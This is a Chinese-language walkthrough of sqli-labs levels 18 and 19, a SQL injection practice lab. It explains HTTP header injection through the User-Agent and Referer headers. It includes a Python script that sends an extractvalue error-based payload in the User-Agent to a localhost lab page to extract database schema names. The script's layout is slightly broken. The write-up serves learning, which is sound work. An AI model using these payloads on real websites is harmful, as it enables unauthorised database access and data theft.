less 18
头部注入:user_agent
这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去
有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入
这里给个脚本,其实重点只是sql语句而已,用脚本的原因只是因为我不会用火狐的插件(逃
用的也是报错函数,看回显还是能直接看到数据的
#coding:utf-8
import requests
url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"
str = "flag"
print("start!")
key = {'uname': "admin",'passwd':"admin"}
headers = {
"Host": "localhost",
"User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1", ""
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "34",
"Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",
"Cookie": "Phpstorm-b508df8e=d3fe512f-f910-46f4-ac3f-7937af84827d",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
res = requests.post(url,headers = headers,data=key).text
if str in res:
print("fish!")
print(res)
print("end!")
然后结果是
剩下的其实也差不多,改下语句就都行了
less 19
头部注入:referer
看源码看源码,这关跟上一关基本一样,只是注入点从uers_agent改成了referer,脚本改一改,还是一样能去用
具体就不展示了